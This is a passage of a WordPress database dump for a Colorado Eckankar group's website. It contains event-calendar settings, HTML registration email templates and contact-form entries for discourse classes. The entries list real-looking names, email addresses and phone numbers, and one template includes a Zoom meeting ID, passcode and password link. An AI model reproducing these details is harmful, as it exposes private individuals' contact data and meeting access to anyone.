2:\"10\";}}'),(190387,268940,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190388,268940,'mec_certain_weekdays','a:0:{}'),(190389,268940,'mec_allday','0'),(190390,268940,'one_occurrence','0'),(190391,268940,'mec_hide_time','0'),(190392,268940,'mec_hide_end_time','0'),(190393,268940,'mec_comment',''),(190394,268940,'mec_timezone','global'),(190395,268940,'mec_countdown_method','global'),(190396,268940,'mec_public','1'),(190397,268940,'mec_start_date','2023-09-03'),(190398,268940,'mec_start_time_hour','10'),(190399,268940,'mec_start_time_minutes','30'),(190400,268940,'mec_start_time_ampm','AM'),(190401,268940,'mec_start_day_seconds','37800'),(190402,268940,'mec_end_date','2023-09-03'),(190403,268940,'mec_end_time_hour','11'),(190404,268940,'mec_end_time_minutes','30'),(190405,268940,'mec_end_time_ampm','AM'),(190406,268940,'mec_end_day_seconds','41400'),(190407,268940,'mec_repeat_status','0'),(190408,268940,'mec_repeat_type',''),(190409,268940,'mec_repeat_interval','1'),(190410,268940,'mec_repeat_end',''),(190411,268940,'mec_repeat_end_at_occurrences',''),(190412,268940,'mec_repeat_end_at_date',''),(190413,268940,'mec_advanced_days','a:0:{}'),(190414,268940,'mec_in_days',''),(190415,268940,'mec_not_in_days',''),(190416,268940,'mec_hourly_schedules','a:0:{}'),(190417,268940,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(193391,269176,'mec_attention_time_start','1696761000'),(193390,269176,'mec_attention_time','1696761000:1696764600'),(193311,269169,'mec_local_timezone','America/Denver'),(190418,268940,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(190419,268940,'mec_fees_global_inheritance','1'),(190420,268940,'mec_fees','a:0:{}'),(190421,268940,'mec_ticket_variations_global_inheritance','1'),(190422,268940,'mec_ticket_variations','a:0:{}'),(190423,268940,'mec_reg_fields_global_inheritance','1'),(190424,268940,'mec_reg_fields','a:0:{}'),(190425,268940,'mec_bfixed_fields','a:0:{}'),(190426,268940,'mec_op','a:0:{}'),(190427,268940,'mec_fields','a:0:{}'),(190428,268940,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10295:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8399:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(190429,268940,'mec_event_status','EventScheduled'),(190430,268940,'mec_moved_online_link',''),(190431,268940,'mec_cancelled_reason',''),(190432,268940,'mec_display_cancellation_reason_in_single_page',''),(190433,268940,'protect_children',''),(190434,268940,'passster_activate_global_protection',NULL),(190435,268940,'passster_activate_protection',NULL),(190436,268940,'passster_protection_type','password'),(190437,268940,'boldgrid_hide_page_title','0'),(190438,268940,'_thumbnail_id','268485'),(190439,268940,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(190440,268940,'boldgrid_in_page_containers','1'),(190453,268940,'_dp_original','266545'),(190442,268940,'passster_area_shortcode',''),(190443,268940,'mec_cost_auto_calculate','0'),(190444,268940,'mec_style_per_event','global'),(190445,268940,'mec_trailer_url',''),(190446,268940,'mec_trailer_title',''),(190447,268940,'mec_start_datetime','2023-09-03 10:30 AM'),(190448,268940,'mec_end_datetime','2023-09-03 11:30 AM'),(190449,268940,'mec_sequence','8'),(190450,268940,'mec_event_gallery','a:0:{}'),(190451,268940,'mec_related_events','a:0:{}'),(190452,268940,'mec_banner','a:0:{}'),(190454,268940,'_edit_lock','1693147100:15'),(190455,268940,'_edit_last','15'),(192422,269132,'_seq_num','188'),(192421,269132,'_form_id','21'),(192420,269132,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(192419,269132,'_field_228','US'),(192418,269132,'_field_227','CO'),(192417,269132,'_field_226','mtom178488@sbcglobal.net'),(192416,269132,'_field_225','Tom'),(192415,269132,'_field_224','Monica'),(192414,269131,'_seq_num','23'),(192413,269131,'_form_id','61'),(192412,269131,'_field_649','Might we be able to move it to an earlier start time?   May wish to poll the Satsang members if an earlier start time will work for the Arahata...'),(192411,269131,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(192408,269131,'_field_652','Barnes'),(192409,269131,'_field_653','live4eck@gmail.com'),(192410,269131,'_field_651','(303) 253-0394'),(192407,269131,'_field_654','David'),(192406,269130,'_seq_num','22'),(192403,269130,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(192402,269130,'_field_651','(801) 750-6581'),(192401,269130,'_field_653','rmorandi@comcast.net'),(192400,269130,'_field_652','Morandi'),(192399,269130,'_field_654','Roger'),(192398,269129,'_seq_num','21'),(192397,269129,'_form_id','61'),(192396,269129,'_field_649','Candy,\n\nI can provide the technical support.\n\nIn ECK,\nLewis'),(192395,269129,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(192394,269129,'_field_651','(970) 381-3323'),(192393,269129,'_field_653','lewis.jackson@unco.edu'),(192392,269129,'_field_652','Jackson'),(192391,269129,'_field_654','Lewis'),(192390,269128,'_seq_num','20'),(192388,269128,'_field_649',''),(192389,269128,'_form_id','61'),(192387,269128,'_field_656','The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom'),(192386,269128,'_field_651','(303) 912-6294'),(192378,269127,'_field_651','(407) 766-2765'),(192377,269127,'_field_653','Linda.Bowman613@comcast.net'),(192376,269127,'_field_652','Bowman'),(192375,269127,'_field_654','Linda'),(192374,269126,'_seq_num','18'),(192373,269126,'_form_id','61'),(192372,269126,'_field_649',''),(192371,269126,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(192370,269126,'_field_651','(720) 314-6317'),(192369,269126,'_field_653','jeremym@eldoradosprings.com'),(192365,269125,'_form_id','61'),(192366,269125,'_seq_num','17'),(192367,269126,'_field_654','Jeremy'),(192368,269126,'_field_652','Martin'),(192364,269125,'_field_649',''),(192359,269125,'_field_654','Marilyb'),(192360,269125,'_field_652','Millar'),(192361,269125,'_field_653','marilynmillarhu@gmail.com'),(192362,269125,'_field_651','(720) 775-7440'),(192363,269125,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(192847,269146,'mec_event_status','EventScheduled'),(192848,269146,'mec_moved_online_link',''),(192846,269146,'mec_fields','a:0:{}'),(192845,269146,'mec_op','a:0:{}'),(192739,269144,'mec_start_time_minutes','30'),(192740,269144,'mec_start_time_ampm','AM'),(192738,269144,'mec_start_time_hour','10'),(194829,269322,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(194827,269322,'_field_653','rstoeklen@comcast.net'),(194828,269322,'_field_651','(303) 217-0448'),(192260,269120,'_field_654','Michael \'Stoney\''),(192261,269120,'_field_652','Merriman'),(190644,268947,'mec_event_status','EventScheduled'),(190645,268947,'mec_moved_online_link',''),(190646,268947,'mec_cancelled_reason',''),(190647,268947,'mec_display_cancellation_reason_in_single_page',''),(190648,268947,'protect_children',''),(190649,268947,'passster_activate_global_protection',NULL),(190650,268947,'passster_activate_protection',NULL),(190651,268947,'passster_protection_type','password'),(190652,268947,'boldgrid_hide_page_title','0'),(190653,268947,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(190654,268947,'boldgrid_in_page_containers','1'),(190655,268947,'_thumbnail_id','268948'),(190656,268947,'_wp_old_date','2022-04-30'),(190657,268947,'passster_area_shortcode',''),(190658,268947,'mec_cost_auto_calculate','0'),(190659,268947,'mec_style_per_event','global'),(190660,268947,'mec_trailer_url',''),(190661,268947,'mec_trailer_title',''),(190662,268947,'mec_start_datetime','2023-09-10 10:30 AM'),(190663,268947,'mec_end_datetime','2023-09-10 11:30 